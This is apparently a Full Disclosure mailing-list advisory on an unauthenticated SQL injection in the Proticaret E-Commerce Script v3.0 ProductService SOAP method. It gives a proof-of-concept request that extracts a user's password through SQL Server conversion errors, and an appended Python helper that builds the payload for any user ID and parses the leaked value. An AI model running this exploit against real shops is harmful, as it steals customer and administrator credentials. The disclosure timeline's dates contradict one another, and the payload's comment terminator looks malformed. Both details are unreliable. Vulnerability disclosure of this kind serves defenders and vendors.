Full Disclosure mailing list archives

Proticaret E-Commerce Script v3.0 SQL Injection
From: Onur Alanbel <onur.a () windowslive com>

Date: Sat, 15 Nov 2014 17:34:55 +0200

Document Title:
===============
Proticaret E-Commerce Script v3.0 >= SQL Injection

Release Date:
=============
13 Nov 2014

Product & Service Introduction:
===============================
Proticaret is a free e-commerce script.

Abstract Advisory Information:
==============================
BGA Security Team discovered an SQL injection vulnerability in Proticaret E-Commerce Script v3.0.

Vulnerability Disclosure Timeline:
==================================
20 Oct 2014 : Contact with Vendor
20 Nov 2014 : Vendor Response
26 Jun 2014 : Patch Released
13 Nov 2014 : Public Disclosure

Discovery Status:
=================
Published

Affected Product(s):
====================
Promist Bilgi İletişim Teknolojileri A.Ş
Product: Proticaret E-commerce Script v3.0 >=

Exploitation Technique:
=======================
Remote, Unauthenticated

Severity Level:
===============
Critical

Technical Details & Description:
================================
SQL Injection. The Code parameter of the GetProductCodes method of the
ProductService web service (ASPNetPortal.ProductService.GetProductCodes in the
stack trace below) is placed unescaped into a SQL Server query, and the method
can be called without authentication. Because the service returns the
SqlException text inside the SOAP fault, the injection can be exploited
error-based: the PoC selects an nvarchar column (the password of userId 101)
in a subquery and compares it with an integer, SQL Server fails to convert the
value and raises "Conversion failed when converting the nvarchar value '...' to
data type int.", and the selected value is echoed back to the caller in the
faultstring.

Proof of Concept (PoC):
=======================
Proof of Concept Request:

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
   <soapenv:Header/>
   <soapenv:Body>
      <tem:GetProductCodes>
         <!--Optional:-->
         <tem:Code>1' from Users where (select top 1 password from users where userId=101)>1- -</tem:Code>
         <!--Optional:-->
         <tem:StartWith>?</tem:StartWith>
      </tem:GetProductCodes>
   </soapenv:Body>
</soapenv:Envelope>

Response:

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
   <soap:Body>
      <soap:Fault>
         <faultcode>soap:Server</faultcode>
         <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.SqlInternalConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction)
   at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose)
   at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady)
   at System.Data.SqlClient.SqlDataReader.TryHasMoreRows(Boolean& moreRows)
   at System.Data.SqlClient.SqlDataReader.TryReadInternal(Boolean setTimeout, Boolean& more)
   at System.Data.SqlClient.SqlDataReader.Read()
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
         <detail/>
      </soap:Fault>
   </soap:Body>
</soap:Envelope>

Solution Fix & Patch:
=====================
Apply the patch for v3.0.

Security Risk:
==============
The risk of the vulnerability above is estimated as critical.

Credits & Authors:
==================
Bilgi Güvenliği Akademisi

Disclaimer & Information:
=========================
The information provided in this advisory is provided as is, without any
warranty. BGA disclaims all warranties, either expressed or implied, including
the warranties of merchantability and fitness for a particular purpose. BGA or
its suppliers are not liable in any case of damage, including direct, indirect,
incidental or consequential loss of business profits or special damages.
Domain: www.bga.com.tr
Social: twitter.com/bgasecurity
Contact: bilgi () bga com tr
Copyright © 2014 | BGA

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
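The error-based extraction in the PoC above, worked through as an added example. This is not code from the advisory or from Proticaret; it builds the GetProductCodes envelope from the advisory with the advisory's payload reproduced verbatim (including its trailing "- -"), and parses the value that SQL Server echoes back in the SOAP faultstring. The function names, the userId argument and the two sample responses (one abbreviated from the advisory's fault, one constructed normal reply) are assumptions made for the example. Nothing is sent over the network.

```python
import re
import xml.etree.ElementTree as ET

# Namespaces used by the GetProductCodes request and the SOAP fault response
# shown in the advisory.
SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
TEM_NS = "http://tempuri.org/"
ET.register_namespace("soapenv", SOAP_NS)
ET.register_namespace("tem", TEM_NS)

# SQL Server's conversion error quotes the value it could not convert; that
# quoted value is what the injection leaks.
CONVERSION_RE = re.compile(
    r"Conversion failed when converting the n?varchar value '(.*?)' to data type int"
)


def password_payload(user_id):
    """Injected Code value modelled on the advisory's PoC (assumed helper).

    The nvarchar password is compared with an integer, so SQL Server has to
    convert it and fails, leaking it in the error text. The comment
    terminator is reproduced verbatim from the advisory.
    """
    return (
        "1' from Users where (select top 1 password from users "
        f"where userId={int(user_id)})>1- -"
    )


def build_request(code_value, start_with="?"):
    """Serialize a GetProductCodes SOAP 1.1 envelope with the given Code."""
    envelope = ET.Element(f"{{{SOAP_NS}}}Envelope")
    ET.SubElement(envelope, f"{{{SOAP_NS}}}Header")
    body = ET.SubElement(envelope, f"{{{SOAP_NS}}}Body")
    op = ET.SubElement(body, f"{{{TEM_NS}}}GetProductCodes")
    ET.SubElement(op, f"{{{TEM_NS}}}Code").text = code_value
    ET.SubElement(op, f"{{{TEM_NS}}}StartWith").text = start_with
    return ET.tostring(envelope, encoding="unicode")


def extract_leaked_value(soap_response):
    """Return the value leaked in a SqlException conversion error, or None.

    A normal (non-fault) reply, or a fault without the conversion message,
    yields None so a caller can tell a leak apart from a failed request.
    """
    root = ET.fromstring(soap_response)
    fault_string = root.find(f".//{{{SOAP_NS}}}Fault/faultstring")
    if fault_string is None or not fault_string.text:
        return None
    match = CONVERSION_RE.search(fault_string.text)
    return match.group(1) if match else None


# Constructed sample fault, abbreviated from the response in the advisory.
SAMPLE_FAULT_RESPONSE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <soap:Fault>
      <faultcode>soap:Server</faultcode>
      <faultstring>System.Web.Services.Protocols.SoapException: Server was unable to process request. ---> System.Data.SqlClient.SqlException: Conversion failed when converting the nvarchar value 'secretpassword' to data type int.
   at ASPNetPortal.ProductService.GetProductCodes(String Code, String StartWith)
   --- End of inner exception stack trace ---</faultstring>
      <detail/>
    </soap:Fault>
  </soap:Body>
</soap:Envelope>"""

# Constructed sample of a normal reply: no fault, nothing leaked.
SAMPLE_OK_RESPONSE = """<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetProductCodesResponse xmlns="http://tempuri.org/">
      <GetProductCodesResult/>
    </GetProductCodesResponse>
  </soap:Body>
</soap:Envelope>"""


if __name__ == "__main__":
    print(build_request(password_payload(101)))
    print("fault reply leaks:", extract_leaked_value(SAMPLE_FAULT_RESPONSE))
    print("normal reply leaks:", extract_leaked_value(SAMPLE_OK_RESPONSE))
```

The parser only trusts the quoted value inside the conversion message, so a generic fault or a timeout is reported as None rather than as leaked data; in a real run the same envelope would be POSTed to the ProductService endpoint with a text/xml content type and the response fed to extract_leaked_value.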